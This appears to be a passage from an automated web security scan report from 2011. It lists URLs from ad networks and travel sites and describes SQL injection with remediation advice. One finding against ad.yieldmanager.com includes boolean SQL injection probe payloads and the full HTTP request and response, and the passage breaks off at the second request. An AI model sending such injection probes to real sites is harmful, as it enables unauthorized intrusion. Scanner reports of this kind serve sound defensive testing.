92be0b10d915ad171058d25c9c252bc80805dce5ae07bee1b7fdfa4e16eb16199ee5c035d0b72f0535a40285bc02469b5ca589600aa302ac307f41f4c127f25807c2171abcda262a66997fdbd8648e706525d12b903d85f86bb00bfb0301ab023897426a18e2030341b5efbcbdc17f00e29490995e7e645e8c071c45763bff07d4cbd08c55b970aa2d69a2cdf4fbfa782a03e52f35203c604c02aa3d9fcef7967a72f1ffce2ea1d5f833c7824d52dbfac17e6d7c68a56a0291505b6dcce38f9c3bf8201c2cd44c61012f9eda3262e104529eefb332c9d5d53a2224c7cf8174f37fc9c077c78741c63ed45f76392a107872e324ab126432f4bedad5544cdac00973163999da663410d559c34d37d16c8825a24c79255bb9f5a9c3d3add2b39f9e11cdf9b08d4c20101b4a58f69693c139eac5cdb238495e8c369a1cf1c7a4211cd721814f21f6a798bfaceeacb01dce7b881fe4b34f9df974d2fa95bd1155b2cf138d981c4ce5f48a9f05e54ae283da7169509a69c7c0532e3ed3581b3d9f55aa3be902628708d95f59ddeb0b605aa711fc0e0c26d3c6a36749acd52b687c2858f2dd38372d724b42ba7699a42b300cd6ff37e859dc8977f5383a32900a155101c10def4af4e74f56bd89a6245fcc853d10ee0c09c2027d0f5af97bd51b7ce9b0b278631a5cadc8aa32b4fbc749ea6d0e2965d93432cc0ab1d68d7bc5c72fd11ede18cbbe0c07f4e0313b666e7c50092ede0601d16080ecf6c303cee3d9a3bc0f723c65d31c8e52458d23f7b439bb80af0e822edfe3ab3de1b40d5c39329eba1ba206e4ed966cc78f309399465fcc747f0d7b19e83bf55f153f6dc5fbb120019a0c2

28.71. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242e360cd228b0a9f5ce36cd7ae3924cbeb05ca695832411d3ee0910c8eb07b1625753857e051e7336ac162ee32647ce02fc6488ccba1315aed893e219377b56013ce1b4b343950da3287741e91a387152a222a96b5e64c1fe804723d08c84ab85bbddab3e05aafc5b008e1b951e241f5a571874422724f41a76d8f7c8b4c7a09beb3b83ea42bbd001b8cf2ee001e56ade9c779fcc2d628d24594e1b7d1c51005929b853a591ce58c8d3cc335f0cf4d34caf4e452a5362ed22584f4e926cd6a310ae8a08882d174da594d01da3807ad7054f3ff3323bb15b96a8960c457ffb6dcf804cbe87f9fc2253380d08e93542b96517e511b542aaa3d70cb1e0dc106a2655b9c690414e024f1e6a5ebef05104b3affb2d300d3ba13ab148586063b9465c74acbf1fc5afc572d8ef7eaa30424a919dd15a02b564226867a487a382664224fb809c7c52d40b1580f15254504f8a5ff471b010808f8ce9544a19a096fcddf929f12805060f4fb49a530dd811d17f4e248f1e60729408e1156de32fdf347a43d1503f98735b79011746cdd4998406eb2d28aeb14f0309cb412e120f1fe554a59b3179284872fd87a41dcf777320427c4618149e6dd2e3cffd464b9e247b922373da9eb8e6f747d4c08ff569ed5e862855153c564f292731a68e363047da6602d8ef36b0a1fd177ed1013dd9b98c161dc49d7ebd71ca1f848e155462d482710f714a6967ad6fd00d2b733a95bfd99cdcba4b20d9c7eb4358ff95f8e0199b9a2ec2d2d508dacc249533fc4bd8392b12f48863b678bc28259593f538b6377dc0329c8d02db4f25a43f7a350efb2f64bc3c0d14d9e8941e60f502ae5ce5c7556ea2d96ee5f520271e5606a0c8495a0539d06194009eebce941bc8db37370cb14e0182c7045207e59769023f0af16fb66943d5fde3690d800f18fc85ccb4cb77ae91e7b83aeea35b07a8ca9306b1b4b7cf71506577c4b8931578c8c4ace42ea6b3acb1ba01a1b127c2fd87c7a71e199ea67bf2ddaa2ee9602fc1b443006fb1a8909dfac44e7bf2419b8248e7e3ee08b4763356a1cb8c39d6aad4f4e080e84e6c232e3da7885036be3f37a49be5bc50c925bf1c0803db92a81d8ebd57958e85a54801d8440cc9ab8b47b71ab3b4beae1ee1e0b836a7822832da4af42efd8c08456aa231a1ee4dfc738fdcbe5825a97da13c5141daae6ac2c2743582bafe0284aa71b10fc740d22be405463fad7012d30764967e212af6893ab5493642723dd320f211eabf21141d8b11bfa5e75d5c9ed75494c528537d97b42cb8c0025cb9549bb825e872c76d2787ab9f054c5f74d96d8590cb1f3c76b353116c4bf579c7783c1ba996ba09f1822530fdf1e5c53be163324ccfbdb8c8943cbb0f1c6ea0567a38996463ff640871e522cf06a8bd0949d4f07bf9a1e46b06977a35ddb5ca9ca720a72e8f86382e28ef500f7ba93257f248ec2a39ddcb0b103fc761ec7e4c2383e3e3327999a53b1d4c787d82281d328d774bc28f5699a12e4019e69f577869d9a94295dd6a3700cf404471c468cf0af1974f33ed9c8334ffbcf58d75de5c29d707e86f0fec7e75be0cec35d708a37a7cbd18da5204fb9269ead80e0c452c3447f92a91b6f88ef0823f446e3e1dde6b1c22a150443b360b1cf099febe2341f150551973e6767eb68963ec7a37597033d90b2780c8d3c26439eef5af6e82db9f838ba89111585c38860a5bf001dc8c3

28.72. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242e360cd228b0a9f5ce36cd7ae3924cbeb05ca695832411d3ee0910c8eb07b1625753857e051e7336ac162ee32647ce02fc6488ccba1315aed893e219377b56013ce1b4b343950da3287741e91a387152a222a96b5e64c1fe804723d08c84ab85bbddab3e05aafc5b008e1b951e241f5a571874422724f41a76d8f7c8b4c7a09beb3b83ea42bbd001b8cf2ee001e56ade9c779fcc2d628d24594e1b7d1c51005929b853a591ce58c8d3cc335f0cf4d34caf4e452a5362ed22584f4e926cd6a310ae8a08882d174da594d01da3807ad7054f3ff3323bb15b96a8960c457ffb6dcf804cbe87f9fca292890d6cd87536c914b721f181414af3343fe0e138920aa65419774524be075b2b5f1b2ab1843066aece8f71bddba05ab23869f2955d227d572dab9ed5efa167bc2bca8e25175f55d8517e1334f21288737072c7d27637d16f854c0dd280fa75c5005264714eabeb75412061049f5d29109a198147ec69f9b9f16cd432dbab74fa42fd1960054baf005cfc3345776ae2b78b506d2cf4ee9305215f3c36ab8d804343c9f17c24d6eec92d5a4068d44f3d6279640d681363e30e10dcb959a7fae6a40cb8c5c464066a6609612e1ca6d7cbebb13dacd2ed9055d5fa282c9392f2b0059e61cc683da74b2574cfa23bac627512bab396e0ec31846f4870c6b1fbb2aa9415784daeb8b66c15ffadddd07aeb250f9460b6b057407ef01cffd2193a454c3b83fa845fc98ded6bef457c93bc17ecaa9069b0e82f4e8a17e214d9cc28208446593ebc1ceef705486376b84c3971b165140960058f31a24ebdd78dda40e1df4d33cb0a0e25895c8df49c4854bbb5c1435a5a6373611b67fd5ed4455456dfe5e061dc59eef4191141e0d0cebbbbb4cb781b92e7e8616fb483130032b2512378536e0c258ba2bc76a069b759c8c4ea58f9b5ac759a529801d7ba7eda93afe0ddabb50284d0f2dd2330e40235b893f0fdbdc19c91fed6c3b901ef11a4e147b7d807d2f22b5c5ed60ec2985a5eec30af349443453a8158905daaa4ab3ef284cba238d2b33eddc4838376817bec49561a8484b5e5486b69e61b6d77380006cb4f07b4abc0e97049d0da6d59f2b8d1abaf88ef36907fd525691579327f18efee02836a77f4df2e3be17598d3b2e778029bba743ee8ccd845ea6294f06e2decf38abc4ebd95b95c510c7161faabbad762f454429e9f43927ce5a51f3771c7da9144261adc801782c234a62e741a2649cf5409d6a5228dd012b0f5fb3ea5a14d8b11bfa76748fc9f8331643549233dc7357c4975f7e97c004bd9e5dcc60318d2b38ade449d6cd0bc0da163ca2e2c4297f6152d0aa548b27d987e3d839ab944c7f560e8e4b0e52bf46302a88e7cdea9f0e86a7b4c0a01e32ab8b90482efe55db125a2ff53fdd80c39a4807bd9d1e13e56e2da4058f0ffb9d7d0d21e8f86286b288f55fa6e898222c74dd91f19e8bb4e607fd2a4bc0e3c538383c327191ca03e7849185da7384812fda77ed78a439991ce205c96df42fd8c9cc937c5383f7250ca2061e1f47daf3fa197aa139df9f6e4efa9e59d75be2c49820728fa1f9c7ef5bb6cc9e0e218461a09d818da52d4bb27dcbf682b79452c84d2c97a61e3989ef5a27a040eceed8b1e79127130111b637e59e539ee9b1314215045bc86f7123a277006a15b4

28.73. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242f06ec4338f0c9609ed6286853138dbcf4b992a457f09522bedec119d956e043c6b5402b520bf74799c4cc7352300b03ec55280aee97c70eadf262fc27cbb7d1dc35c2e78397fd23e977853c5a3d30e2a3a2ed6b5bf1d1ebe14630a4b801ce334f0d6b7e654b582da1ce5b34bff1ee3a54c9f54797c5759ea6685618f272e01ec89ac279236b644448ae5e9470856b0eed63ab489a93ed746c3c0b9cccd150198cac82b4a05f4998f7dce37bbdf017ad4a4ee52a53e63863fca84f824e07d3d0be3ff88889026995f5e1087634ee46e4fedb02527ba58bd7f9d2ce466b0b7cbcf63ecba56f9f81b18b5d0859f49278b4c775444697be06e2b9b565cc04d93745fad54191ca808e5e5b2e7ef0a49077aaaaa8b448ea80ff467d08836009661c7768fadf41dd83148f0919ac17152cc65b25fba3f11362bd56a5f6d6930237f44a642d59f380be709504679151cbde6f81f414d5612b99bda4efab25f269df3baac129f6d64eaa245b933c89f2c31d2c578cbc2385011b00c499227f7f377b927155dce8337fa811f6c2d831fc7113df4c487a6028e45f7d275955a8488303624f90d82ded93fae2d188aa6373b0b6287708146a89a4553a79039e9a14baf71203aa0ec8b757b6c5a0d8a5a83c49b1cf7011aae39b6ca275b2ea43a6203cc1644f4870b6f1bbb3da0495f82d6f68b398a66d7eecc1eaff848e155512b5e2015ed12a39363d2f00cd9ba2bbb47eff6b092f2ac07d836d061d9b615f364ceb9bde36a355e9edd840e4c6b9eeaced8e6754b802c63938edb405b1310980e25fb3b0fc0ef19c5bc1d5aa1c06ffced00877b9c

28.74. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242f06ec4338f0c9609ed6286853138dbcf4b992a457f09522bedec119d956e043c6b5402b520bf74799c4cc7352300b03ec55280aee97c70eadf262fc27cbb7d1dc35c2e78397fd23e977853c5a3d30e2a3a2ed6b5bf1d1ebe14630a4b801ce334f0d6b7e654b582da1ce5b34bff4fedf75c954072310e47bb718171cc3f6008bbb3a666ef26bc4658dabae0475615acfb8070f584d93ecd6e9fc7bedbdc1c12c3839d265f1df0cb8e31d62de3980d6fc3b5ec52a8247b8d3fcadff665f1773943fda08486923a9d1c5b14c46941ec600deca53c60e5548a7c9d4ce75bf3bfe7f64cdbe26692916675d494d0c21072c9133d4a407a24bb7c26880f0a981ff62c1d8577075faf26f1e0ade3e25b044f29f7e8d35addf752a63b80822f0e896d8f67ccf9e456e61238d3b7b4f14177ed5ac04ae72e54672a802b5d313e24752101fa43dec67703b2571c112c4918e5a6b44e0318425bb7839b04a79f146fcc93c99059bf7a5ecb80619f01fea63f29e6b344acbf093410c24a049160b3a119b5364c4ff4c768b8dd0d676e841291103df9c684b20c8251f1a1648c56f6f1476f76864a83c1da3f9f3800b689474f7642b056b057dbcb6e6da68d37d7eb05f930517bfeb2d66f747d58038d4c84c29e1cf40c0da735b5d723462fa33f6b18d80c01b3d04a1849fa67f1535d968cb5dc708a15aac4e706b9b713e15e5d285e2014f212a89767d4fe06cfb32ea85cf890d6dfbef74acb3fc367cea30e94038de3e1aa79384996ca8d054b729af1dbc2811c10c56f309fc18d1c165153941337825e63b7886fdebf070bf3c03ea3cf931cd2948b5ec79e42a1461446d88c1c2e1ff926d5e648555470eb34605189cba34d9a181e0d48ace7ef0afc9aad3417df53fb0c6c20056b7158709123e0a70dab3c9d340cd934928602a0d59a59c912e17ce64d7385ffef35bf75d7fd346c1f4c2da44855532b188f6307dbd919984cba3d3b971aa64a1c127b788d732876b4cbbd60eb28d4f6ba9603a31a456007f91b8f028dfc40e9ba794cef21882b3eb4d61e60643b4bea91c33aa91d4e580d80e69530bed07dd40569e7f92e4eee0f990ec55cacd5cf278c1ae9ab88f56354f950069a039579aaddfcec2b65a02d43a2b6bd1e098c692f758628befd10bbdc96885daa234f53e588c036f1cbba8e5b95961a90114cfaeaad2d7e46127fb4a96e22ce5a05f2741679ac444364f6ca562a3c6b5809a253b832c4fd16c3276951b57e4e7a44a4bc522fcbac78d5716cd8eaf820201a06db34ab081bdc8f1b78ca9a56e9995dcc3c648c793effe44bd6995bdbcf0206e5af8b6f683146c8ad5b8e278391efcc39aa9f482905058c1e5a01ef47377bd6efcae4c705d7fcb7c0a81067ab8dc3477eaf5b84175e25f26e8e83c3994e57e8981019e56e79f150db5afbcf7f5922bcf832d3e2daf701a0ea937d2e248995f29e8ce7bb57f97748c2b6943e36683773909253b2d797d2db27de8028d825ef24a33a9c15e306ce3eff2cd0c9c9c17a5283a42701a007474e46d8a3f14921a63bd99b324cfac806865fe2c48c3d64e9b0eb8bb307e59fd75d2a8763fadede9ca07b1de9269fa780b69b58c3447992fa4e6c86bc4c6de7228088ffd2c0d624540c42a27ef980006ee1c2

28.75. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/f6866c92a8364fce80a4ac8ec97ff3af0ab1a91f759648ddbe8945b1fbc2a0c691c542d898873efe10f7b76c498ddb47cc43ec556e608db660d2da235157b5b9128144e031cdcb7ce883bc49bd6f4730c072d8a321c7d52ad125718084660403740fb6f080029b901e51b24a6221c496ceb95bab942b3a694ac765383e98e433393622f9d9f17e931a8eda17a812d683a6150e4b01c1e0f9ef4d85dc205723703dd0fc6f4124ba9072e2cc09f47b21bb5e672212e3bf7da7533d15f6a230f3710ab161f7f7a5b2a5a252d0a6ba81833bf9f72e776e1b061e383a6b4ac8ad21981ede323ce029e217dc6b4d3a767b82ede1afb1656cb9c46328b4e42351722cb1d0d00694805d504d7ee408963b59c5a0893a5345fde273fc33c0e2ae6543d340c434db5f5259b7c7a5f2ab848cc79dbebf67b9d533ae620852ed6c1d8920d6a293dfe8f9455e3509c5743fc507676071657ae654d7e8d39b07d29e1dc0de2e4372f95c7dc69176950b55e8a6452d713c02b77c0fd34c5119312dffa7d3723ea65f04253b14909bdfcd742cdedd8463497ed70186343273d6a7dc38dd0afe739fd0e2de4758ed2f619fcd61a33f241c15d3272636c5796d73761aa33cfc4bc40be761eaed05ab54419f5c774db5deebc8e4833933c2af78df019a9a326c24e6a99661a26fc6eeedb21a699fcab31cfc38689c60f666b098b2dd24a10e2b2801ea302c1b98bcfa9e50e84f373b269d6d2f7c1b4d28cd72ffdefaf3568c918f5240b9d3a75973ad955ba1cf4ce1a6687430fbfe8f238d3e1d50bb3de38e9966513f7b8d9814cea014bbe91045a7b3d6f41e0c0f30fcd6136d2216784d7da050198f0ca45cff981d25dcec38e29ec2ceabcdc69d0af985a319f277e893cdd705cc459b97a9f26f4f8c39db8a788cebbd56b8dbbb3be102559f17ed51fcf3971853502735446a1a8e4e673c9e1afef64e03a50b1c5ac11b9d02a126640e6e99925fd9c093efb0b093fed00776fae8b6a234b859eda6ebf7ead2a428a2aed140bda22bd319549c4fb4abd4520f933fd05556a3e6d6ba22da703548b4e7dae33bf5d75dda5069cc291a5d21f7457fb554ad2f7406babc64b17db2a18a0c2519aacfd9326004520a2af2e8bb3be2e167b47e96610a60345f48d763bbc0a7dc4f7a39b47c9801dffaadd31a10763ef4d4edbab6edde4160908762feaf55d3b14e034a5c8f914aa5d955986e97282a3fa74e19cfc572e502f6bdf268576d8cef039bd66133d42aac8dd6f6058e280d61404400220b20e735a9a73667798fda7d646935c4d8acb985ea69f8b3f1a7d923def6aba934941b3dda9836064000a5977ed64124fb6efac5661506723c893c81099fd42d42a3267cb2bf376fb91ab003a639be54757e1a4521a98a0cc1919024fe93c16cc95d1cc3761f72590a6a2a2ee078c6e44d87f93480221b85202df07007d97d8a356e3f8fb1962e543a9f04feb0616791ad0125373ad059162a71bbf171f1b26df160876eaf9338caf44f170855d2286eedea1c59d22676858ef53fd11c1ab5a04c6265b369b6fcab8dbf743de1ab8aafaa608973f2f35bfdd8625668ef2bf523b1d91bcd7fbf58e05b67c28d8c4e00a0cbe7a0392ce7e474bc1b86b63b253cbbf302542253da8424ddf9440265015aff36dad47ae90fa3000df4d6

28.76. http://showadsak.pubmatic.com/AdServer/AdServerServlet

28.77. http://sr2.liveperson.net/hcp/html/mTag.js

28.78. http://survey.122.2o7.net/survey/dynamic/suites/332/hotelsallprod/list.js

28.79. http://uxm.thousandeyes.com/rest/json

28.80. http://www.agoda.com/js/MainTextSearch.js

28.81. http://www.agoda.com/pages/agoda/default/page_traffic.aspx

28.82. http://www.agoda.com/pages/agoda/test/rendertime_techno.aspx

28.83. http://www.burstnet.com/cgi-bin/ads/ad22156a.cgi/v=2.3S/sz=300x250A/NZ/9460/NF/RETURN-CODE/JS/

28.84. http://www.cheaptickets.com/cacheable/empty.html

28.85. http://www.facebook.com/extern/login_status.php

28.86. http://www.getaroom.com/browse/market_deals

28.87. http://www.hotels.com/hoteldetails/urgencypopup.html

28.88. http://www.hotels.com/selectors/en_US/

28.89. http://www.hublot.com/favicon.ico

28.90. http://www.inadcoads.com/script.ashx

28.91. http://www.manutd.com/styles/greybox/gb_scripts.js

28.92. http://www.nike.com/nikefootball/global/xml/style.xml

28.93. http://www.nike.com/nikefootball/home/socialfeeds

28.94. http://www.nike.com/nikefootball/home/twitterfeed

28.95. http://www.nike.com/nikeos/global/modules/nav/xml/country/country_lockup_config_US.xml

28.96. http://www.nike.com/nikeos/global/modules/nav/xml/language/lockup_expand_translate.xml

28.97. http://www.orbitz.com/cacheable/empty.html

28.98. http://www.revresda.com/favicon.ico

28.99. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600406535&dsrc=7&height=225&rotator=true&width=519&adType=script&

28.100. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317601998697&height=225&rotator=true&width=519&adType=script&

28.101. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602110931&height=225&rotator=true&width=519&adType=script&

28.102. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

28.103. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&

28.104. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

28.105. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&

28.106. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

28.107. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&

28.108. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

28.109. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&

28.110. http://www.sabrehospitality.com/favicon.ico

28.111. http://www.sabrehospitality.com/images/masthead/int-masthead-distribution.jpg

28.112. http://www.sabretravelnetwork.com/favicon.ico

28.113. http://www.tnetnoc.com/siteImages/ORB/banners/hotel/details/telesales/ORB_Telesales_HotelDetails-2.png

28.114. http://www.tripadvisor.com/HotelCheckRates

28.115. http://www.tripadvisor.com/api/ratinginfo/1.0/getRating

28.116. http://www.turkishairlines.com/data/gateway.aspx

28.117. http://www.turkishairlines.com/data/promotion.aspx

28.118. http://www.turkishairlines.com/en-CA/quicksearch.aspx

28.119. http://www9.effectivemeasure.net/v4/em_js

29. Content type is not specified

29.1. http://ad.technoratimedia.com/st

29.2. http://ad.yieldmanager.com/st

29.3. http://orbitz.tt.omtrdc.net/m2/orbitz/mbox/standard

29.4. http://orbitzaway.tt.omtrdc.net/m2/orbitzaway/sc/standard

29.5. http://pcm1.map.pulsemgr.com/uds/pc

29.6. http://www.aon.com/manchesterunited/fougrdbd-webfont.ttf

29.7. http://www.aon.com/manchesterunited/vagroundedstd-light-webfont.ttf

29.8. http://www.expedia.com/static/default/default/eta/commonIcons.gif

29.9. http://www.expedia.com/static/default/default/html/calendar/v2.0.0/calendar.html

29.10. http://www.expedia.com/static/default/default/images/bubble_left_onblue.gif

29.11. http://www.expedia.com/static/default/default/images/bubble_right_onblue.gif

29.12. http://www.expedia.com/static/default/default/images/eta/sp_logo.gif

29.13. http://www.expedia.com/static/default/default/images/eta/stampa.gif

29.14. http://www.expedia.com/static/default/default/images/hotel-sprite.gif

29.15. http://www.expedia.com/static/default/default/images/infosite/bg_button_b.gif

29.16. http://www.expedia.com/static/default/default/images/infosite/bg_button_span_b.gif

29.17. http://www.expedia.com/static/default/default/images/infosite/button_beak_b.gif

29.18. http://www.expedia.com/static/default/default/images/infosite/hotel_detail_rating_bar.gif

29.19. http://www.expedia.com/static/default/default/images/infosite/icn_quote_beak_down.gif

29.20. http://www.expedia.com/static/default/default/images/infosite/icn_quote_beak_up.gif

29.21. http://www.expedia.com/static/default/default/images/infosite/rating_bar.gif

29.22. http://www.expedia.com/static/default/default/images/infosite/rooms_left_middle.gif

29.23. http://www.expedia.com/static/default/default/images/infosite/videoPlayLarge.gif

29.24. http://www.expedia.com/static/default/default/stubs/adserver.json

29.25. http://www.expedia.com/static/fusion/v2.3/images/buttonBG.png

29.26. http://www.expedia.com/static/fusion/v2.3/images/container/module-borders-sprite-alpha.png

29.27. http://www.expedia.com/static/fusion/v2.3/images/iconsSprites.png

29.28. http://www.expedia.com/static/fusion/v2.3/images/progressAnim.gif

29.29. https://www.expedia.com/static/default/default/eta/commonIcons.gif

29.30. https://www.expedia.com/static/default/default/images/bpg/BPG_logo_US.gif

29.31. https://www.expedia.com/static/default/default/images/creditcard.gif

29.32. https://www.expedia.com/static/default/default/images/popup_bottom_notch.gif

29.33. https://www.expedia.com/static/default/default/images/progressbar.gif

29.34. https://www.expedia.com/static/default/default/stubs/adserver.json

29.35. https://www.expedia.com/static/fusion/v2.3/images/buttonBG.png

29.36. https://www.expedia.com/static/fusion/v2.3/images/buttonBGtransparent.png

29.37. https://www.expedia.com/static/fusion/v2.3/images/container/module-borders-sprite-alpha.png

29.38. https://www.expedia.com/static/fusion/v2.3/images/iconsSprites.png

29.39. http://www.orbitz.com/App/SubmitQuickSearch

30. SSL certificate

30.1. https://secure.mlb.com/

30.2. https://www.expedia.com/



1. SQL injection  next
There are 24 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://ad.yieldmanager.com/imp [atf parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.yieldmanager.com
Path:   /imp

Issue detail

The atf parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the atf parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /imp?Z=300x250&atf=1'%20and%201%3d1--%20&brw=cr3&efo=0&os=wn7&pfm=1&prm=0&rtg=ga&s=1782250&tlfs=ch&tmen=ch&tphv=ch&uatRandNo=65268&_salt=4187966827&B=10&r=0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1

Response 1

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:53:37 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0134.rm.sp2
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:53:37 GMT
Pragma: no-cache
Content-Length: 1800
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<script type=\'text/javascript\' src=\'http://ad.turn.com/server/ads.js?pub=5757440&cch=5766809&code=5766822&l=300x250&aid=27255150&ahcid=2583630&bimpd=lw-vFKdVdt5jymyFqiJARROI2dRcPU5t9ZR1nw7zLfGyYRMnE5CBXotWai1zkkh5aQyuKezoNUrOWJ5OOejNY_hJQY3n5aB8LYFmoY1scYnkOuPr29GBwJEIlGIG8y6-woDPCiqPiV08NCy4UXORWW1HcKcIB-ji-YZznvV7YFbW-jz71YgLww7DGj5OXU14DGxlqQmkrMO95frYlC-2EecdQoEWgIftwRBNTCUIHlnIX2X-btI9IF1hQqZV-fS_9r7SRIRbOFhwT4uGv7bxlxoogu7v0QCZlqoLiKSE0YoB1I82nS-1Az844z0LvrxUVFSFAqZZv9Y6DfnxcXgN-CLsKli7c3srR59_w2uApkZ4zOGxFlgqKMqOcLjGPeXuw9rtxn9I-6VbCSFXDmUXUF3DL4c-PvPhKwaZQZOxh4y_pKLDOLgieGxoRV6uf0r3GnNxk5QAcyrq8hS2PQWsGSRN6cjv64iyAUwjrCV62Z4kNWUS9C6pnmY7wyLcrDnGRpqH141eggasYFFNO0SQRhrB2q8vsB_pWw7eofVu65DMN8BETOKrAOkHaet0vXqwvfBz5xDsVEqchMpjM7fNhSIgs650GHZdIqJT1wU-IA6y0RdukcSHg45VLcxfHZDyvzvm_C2gw3LCUGFlwKflrjU51HHY789nG4erhkB4WPijkriCu4UjPOsP76C358RxZLtOEV4-KNgW6xYUbQ9gzQ8BL-KZxXJBiWKRPNmIYZxasgEkMt3v87EW0sfEZwqdLK1EaGuwAlEPUKyOoDOQbdT_c9SK2zNgw7l2BpfGmhKXO_wudIg0fd7Kg-WDT38ZQTxw0DEqZsZHYOIht_MLky730X_TxHXAuaaB6eh8srs&sli=3154796&bli=2900475&exPub=425670&acp=0.0150&3c=http%3A%2F%2Fad%2Etechnoratimedia%2Ecom%2Fclk%3F3%2CeAGVT8tugzAQ%2EBpuyMJ2eAn14MQhosJJaVHSckEGGxHxrEMFytfXamjvXa20o9mdWQ3EAa6k9IXAG15C7rpVADEqXUtyiCvTCoIAIs%2EHeIMc8xZtBTkNy2GmXh8l5KeoA38hIdQjSfTgXzwCZgqAnb3HD4YUOzavIjd5W%2DG6%2D9%2DgfvW6XyX632qFPslpuUfbP6%2EDc5tdmM1Q2MaXc3NM9xNLw5btLPsjTaw4LTdZKhqWnjvWHZtsjaT1T6ZZT9NoYGKgULcAk%2DJCLmAYZb%2DAcug0ySsFxlofhfehl1dhYOpgHxrIKQuNr%2E1NqilXvBdDl%2EdfXSFVXkslvwHt2G1w%2C&url=http%3A%2F%2Fd%2Etradex%2Eopenx%2Ecom%2Fafr%2Ephp%3Fzoneid%3D6391%26cb%3Dinsert%5Frandom%5Fnumber%5Fhere\'></script>');
var rm_data = new Object();
rm_data.creative_id = 8690940;
rm_data.offer_type = 3;
rm_data.entity_id = 424978;
if (window.rm_crex_data) {rm_crex_data.push(8690940);}

Request 2

